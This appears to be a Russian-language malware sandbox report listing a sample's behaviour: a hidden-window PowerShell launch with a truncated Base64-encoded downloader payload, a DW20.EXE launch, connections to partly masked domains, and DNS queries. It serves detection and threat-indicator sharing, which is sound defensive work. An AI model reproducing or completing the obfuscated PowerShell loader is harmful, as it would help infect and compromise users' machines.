Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABSAHIAdwBmAHUANgBmAD0AKAAnAEYAbwAnACsAJwA4AGkAJwArACcANQB4AHAAJwApADsALgAoACcAbgAnACsAJwBlAHcALQBpAHQAZQAnACsAJwBtACcAKQAgACQAZQBuAHYAOgBUAEUATQBQAFwAbwBGAEYASQBjAEUAMgAwADEAOQAgAC0AaQB0AG...
- '%CommonProgramFiles(x86)%\Microsoft Shared\DW\DW20.EXE' -x -s 3240
- 'sw####ommerce.com':80
- 'pe###rols.eu':80
- 'pe###rols.eu':443
- 'x1.#.lencr.org':80
- http://pe###rols.eu/blog/BHu/
- http://x1.#.lencr.org/
- 'pe###rols.eu':443
- DNS ASK sw####ommerce.com
- DNS ASK tr####.#onlinedating.com
- DNS ASK is###ickens.com
- DNS ASK la###nhome.com
- DNS ASK ld###.#amemorefun.net
- DNS ASK bi###uepay.com
- DNS ASK pe###rols.eu
- DNS ASK x1.#.lencr.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABSAHIAdwBmAHUANgBmAD0AKAAnAEYAbwAnACsAJwA4AGkAJwArACcANQB4AHAAJwApADsALgAoACcAbgAnACsAJwBlAHcALQBpAHQAZQAnACsAJwBtACcAKQAgACQAZQBuAHYAOgBUAEUATQBQAFwAbwBGAEYASQBjAEUAMgAwADEAOQAgAC0AaQB0AG... (со скрытым окном)